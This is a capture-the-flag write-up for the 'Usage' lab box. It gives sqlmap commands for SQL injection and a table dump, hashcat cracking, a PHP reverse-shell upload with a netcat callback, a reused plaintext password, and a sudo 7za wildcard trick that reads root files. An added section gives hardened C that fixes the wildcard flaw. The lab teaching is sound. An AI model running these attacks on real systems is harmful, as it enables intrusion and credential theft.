Usage (Easy)

Easy difficulty Linux box.....

Enumeration

As usual let's start with an nmap scan:

Nmap scan report for 10.10.11.18
Host is up, received syn-ack (0.089s latency).
Not shown: 998 closed tcp ports (conn-refused)
PORT   STATE SERVICE REASON  VERSION
22/tcp open  ssh     syn-ack OpenSSH 8.9p1 Ubuntu 3ubuntu0.6 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   256 a0:f8:fd:d3:04:b8:07:a0:63:dd:37:df:d7:ee:ca:78 (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBFfdLKVCM7tItpTAWFFy6gTlaOXOkNbeGIN9+NQMn89HkDBG3W3XDQDyM5JAYDlvDpngF58j/WrZkZw0rS6YqS0=
|   256 bd:22:f5:28:77:27:fb:65:ba:f6:fd:2f:10:c7:82:8f (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIHr8ATPpxGtqlj8B7z2Lh7GrZVTSsLb6MkU3laICZlTk
80/tcp open  http    syn-ack nginx 1.18.0 (Ubuntu)
|_http-title: Did not follow redirect to http://usage.htb/
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: nginx/1.18.0 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .

We see SSH and HTTP, so let's add 10.10.11.18 usage.htb to our hosts file and look at the website.

We see that we can register, log in, or visit the admin section, which takes us to admin.usage.htb; we also need to add that to our hosts file and check it later.

After I made an account and logged in, there were only some short articles on the website, with no useful information.

So I went to look at the admin website, but it only had a login form and there was nothing I could do to bypass it, so I decided to go back to the main website and test for SQL injection, since I hadn't yet.

Now trying /forget-password, we see that when we send a single ' we get a server error:

This indicates we might be able to do some SQL injection, so I fired SQLmap at it.

I intercepted the request with Burp, saved it to a file called forget-password.req, and used the following command:

Exploitation

sqlmap -r forget-password.req -p email --batch --risk 3 --level 5 --dbs

This took a while, but we found a boolean-based injection in the email field, and sqlmap retrieved the databases present on the system:

available databases [3]:
[*] information_schema
[*] performance_schema
[*] usage_blog

Now let's enumerate the usage_blog database and see what we can get from it.

sqlmap -r forget-password.req -p email --batch --risk 3 --level 4 -D usage_blog --tables

That retrieves the tables in the DB, one of which is admin_users, which probably holds passwords, so let's dump it using:

sqlmap -r forget-password.req -p email --risk 3 --level 5 --batch -D usage_blog -T admin_users --dump

And we get a username of "admin" and his password hash! Let's start cracking.

hashcat -m 3200 hash.file /opt/wordlists/rockyou.txt
hashcat -m 3200 hash.file --show
$2y$10$ohq2kLpBH/ri.P5wR0P3UOmc24Ydvl9DA9H1S6ooOMgH5xVfUPrL2:whatever1

Let's try logging in to that admin site we found earlier:

Wandering around a little, we see that in the profile we can upload a profile picture, so let's try uploading a quick reverse shell:

So we changed the file extension to php and the MIME type to "application/php" (you can see the content of "shell.php" in the request); after submitting the request and refreshing the profile page, we see a new picture.

Opening that file (via the link from the download), we get a callback and a shell as the dash user.

nc -lnvp 9001
listening on [any] 9001 ...
connect to [10.10.16.6] from (UNKNOWN) [10.10.11.18] 35340
bash: cannot set terminal process group (1243): Inappropriate ioctl for device
bash: no job control in this shell
dash@usage:/var/www/html/project_admin/public/uploads/images$ 

Privilege Escalation

Enumerating a little, we see there is another user called "xander", and we find a password in /home/dash/.monitrc; trying it on that user, we succeed.

dash@usage:~$ cat .monitrc 
#Monitoring Interval in Seconds
set daemon  60

#Enable Web Access
set httpd port 2812
     use address 127.0.0.1
     allow admin:3nc0d3d_pa$$w0rd
<SNIP>

And now we have a shell as xander, let's see the sudo privileges we have:

xander@usage:~$ sudo -l
Matching Defaults entries for xander on usage:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin,
    use_pty

User xander may run the following commands on usage:
    (ALL : ALL) NOPASSWD: /usr/bin/usage_management

So we see this is an executable file, so we download it to our box and check it in Ghidra; what's interesting is the backupWebContent function:

void backupWebContent(void)

{
  int iVar1;
  
  iVar1 = chdir("/var/www/html");
  if (iVar1 == 0) {
    system("/usr/bin/7za a /var/backups/project.zip -tzip -snl -mmt -- *");
  }
  else {
    perror("Error changing working directory to /var/www/html");
  }
  return;
}

So we create a file named @root.txt and a symbolic link root.txt pointing to the file we want to read. When 7z runs, the shell's * hands it @root.txt, which 7z treats as an instruction to read its list of files from root.txt; since that is linked to /root/root.txt, it reads the flag and reports its content as a file it cannot find.

xander@usage:/var/www/html$ touch @root.txt
xander@usage:/var/www/html$ ln -s /root/root.txt root.txt
xander@usage:/var/www/html$ sudo /usr/bin/usage_management 
Choose an option:
1. Project Backup
2. Backup MySQL data
3. Reset admin password
Enter your choice (1/2/3): 1

<SNIP>

Scan WARNINGS for files and folders:

7c5b992<REDACTED>a764d : No more files

And we get our flag :D For shell access, you can read an SSH key or something similar the same way.
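As an added example (not the box's binary or the author's code), here is a hardened version of backupWebContent that removes what the trick relies on: it runs 7za directly through execv instead of a shell wildcard, prefixes every entry with ./ so a name like @root.txt is never parsed as a list file, and skips symlinks. It assumes 7za lives at /usr/bin/7za and the web root is /var/www/html, as on the page.

```c
#define _POSIX_C_SOURCE 200809L   /* lstat, symlink, fork, waitpid, mkdtemp */
#include <dirent.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/stat.h>
#include <sys/wait.h>
#include <unistd.h>

#define WEBROOT "/var/www/html"   /* same paths as the decompiled function */
#define SEVENZA "/usr/bin/7za"

/* Collect the entries of dir as malloc'd "./name" strings. The "./" prefix
 * stops 7-Zip reading "@name" as a list file (or "-x" as a switch), which a
 * shell "*" would otherwise hand to it verbatim; symlinks are skipped so a
 * planted link into /root is never followed. Returns the count or -1. */
int collect_entries(const char *dir, char **out, int max) {
    DIR *d = opendir(dir);
    if (!d) return -1;
    int n = 0; struct dirent *e; struct stat st; char path[4096];
    while (n < max && (e = readdir(d)) != NULL) {
        if (!strcmp(e->d_name, ".") || !strcmp(e->d_name, "..")) continue;
        snprintf(path, sizeof path, "%s/%s", dir, e->d_name);
        if (lstat(path, &st) != 0 || S_ISLNK(st.st_mode)) continue;
        size_t len = strlen(e->d_name) + 3;
        if ((out[n] = malloc(len)) == NULL) break;
        snprintf(out[n], len, "./%s", e->d_name);
        n++;
    }
    closedir(d);
    return n;
}

/* Hardened replacement for backupWebContent(): no shell, explicit argv. */
int backup_web_content(void) {
    static char *argv[1024 + 8] = { SEVENZA, "a", "/var/backups/project.zip",
                                    "-tzip", "-snl", "-mmt", "--" };
    int n = collect_entries(WEBROOT, argv + 7, 1024);
    if (n < 0) { perror(WEBROOT); return -1; }
    argv[7 + n] = NULL;
    pid_t pid = fork();
    if (pid == 0) {                          /* child: run 7za from WEBROOT */
        if (chdir(WEBROOT) != 0) _exit(127);
        execv(SEVENZA, argv);
        _exit(127);
    }
    int status = 0;
    if (pid < 0 || waitpid(pid, &status, 0) < 0) return -1;
    return WIFEXITED(status) ? WEXITSTATUS(status) : -1;
}
```

With the "@root.txt" / "root.txt" pair from the session above placed in the web root, collect_entries hands 7za only "./@root.txt" and drops the symlink, so the list-file read never happens.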

That's it for the box!



We saw a chance to abuse the wildcard used here; the technique is described on HackTricks.

Happy hacking :)
